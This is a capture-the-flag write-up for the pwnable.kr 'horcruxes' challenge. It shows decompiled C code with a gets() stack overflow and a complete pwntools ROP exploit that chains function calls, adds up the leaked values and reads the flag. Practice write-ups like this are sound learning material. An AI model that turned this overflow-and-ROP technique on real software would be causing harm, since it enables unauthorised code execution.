pwnable.kr —— horcruxes

question#

Voldemort concealed his splitted soul inside 7 horcruxes.
Find all horcruxes, and ROP it!
author: jiwon choi

ssh horcruxes@pwnable.kr -p2222 (pw:guest)

analyse#

IDA打开看到ropme函数

int ropme()
{
  char s[100]; // [esp+4h] [ebp-74h]
  int v2; // [esp+68h] [ebp-10h]
  int fd; // [esp+6Ch] [ebp-Ch]

  printf("Select Menu:");
  __isoc99_scanf("%d", &v2);
  getchar();
  if ( v2 == a )
  {
    A();
  }
  else if ( v2 == b )
  {
    B();
  }
  else if ( v2 == c )
  {
    C();
  }
  else if ( v2 == d )
  {
    D();
  }
  else if ( v2 == e )
  {
    E();
  }
  else if ( v2 == f )
  {
    F();
  }
  else if ( v2 == g )
  {
    G();
  }
  else
  {
    printf("How many EXP did you earned? : ");
    gets(s);
    if ( atoi(s) == sum )
    {
      fd = open("flag", 0);
      s[read(fd, s, 0x64u)] = 0;
      puts(s);
      close(fd);
      exit(0);
    }
    puts("You'd better get more experience to kill Voldemort");
  }
  return 0;
}

在gets中存在栈溢出，题目是要知道A+B+C+D+E+F+G的值，等于sum即可，所以我们只要通过ROP，分别执行A、B、C、D、E、F、G，最后再执行ropme，输入sum

get flag#

from pwn import *
context.log_level = 'debug'
p = process('horcruxes')
elf = ELF('horcruxes')
A = elf.symbols['A']
B = elf.symbols['B']
C = elf.symbols['C']
D = elf.symbols['D']
E = elf.symbols['E']
F = elf.symbols['F']
G = elf.symbols['G']
ropme = elf.symbols['ropme']
ropme = 0x809fffc
payload = 'a'*(0x74+4)
payload += p32(A)+p32(B)+p32(C)+p32(D)+p32(E)+p32(F)+p32(G)+p32(ropme)
p.sendline('1')
import  time
time.sleep(1)
p.sendline(payload)
result = p.recv().split('\n')[4:11]
total = 0
for line in result:
    line = line.split('+')[1].split(')')[0]
    print line
    total+=eval(line)
p.sendline('1')
p.recv()
p.sendline(str(total))
p.recv()
p.interactive()